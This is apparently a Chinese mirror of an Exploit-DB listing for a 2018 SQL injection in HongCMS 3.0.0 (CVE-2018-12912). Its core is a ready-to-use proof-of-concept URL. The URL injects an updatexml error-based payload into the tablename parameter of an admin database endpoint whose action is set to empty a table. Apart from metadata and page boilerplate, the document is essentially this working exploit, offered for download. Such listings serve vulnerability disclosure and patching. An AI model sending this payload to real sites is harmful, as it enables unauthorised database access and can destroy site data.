漏洞概要

漏洞标题:
HongCMS 3.0.0 – SQL Injection

提交时间:
2018-06-28

危害等级:

相关厂商:

漏洞分类:
exp公布

关注度:
共 25 人关注

漏洞详情

EDB-ID: 44953 Author: Hzllaga Published: 2018-06-28
CVE:
CVE-2018-12912
Type: Webapps Platform: PHP
Aliases:
N/A
Advisory/Source: N/A Tags:
SQL Injection (SQLi)

E-DB Verified:
<a href="javascript:void(0);" data-trigger="focus" data-toggle="popover" data-placement="top" data-content='We make an effort to verify exploits (verifty) in our labs, when possible. A “non verified” exploit (marked by a clock icon clock) simply means we did not have the opportunity to test the exploit internally.’>
Waiting verification

Exploit:

Download Exploit Code Download

/

View Raw

Vulnerable App:

Download Vulnerable Application
# Exploit Title: HongCMS 3.0.0 - SQL Injection
# Google Dork: [if applicable]
# Date: 2018/06/26
# Exploit Author: Hzllaga
# Vendor Homepage: https://github.com/Neeke/HongCMS/
# Software Link: https://github.com/Neeke/HongCMS/
# Version: 3.0.0
# Tested on: php5.4 mysql5
# CVE : CVE-2018-12912

POC (Administrator Privilege):

/admin/index.php/database/operate?dbaction=emptytable&tablename=hong_vvc%60%20where%20vvcid%3D1%20or%20updatexml%282%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20or%20%60

发表评论

电子邮件地址不会被公开。 必填项已用*标注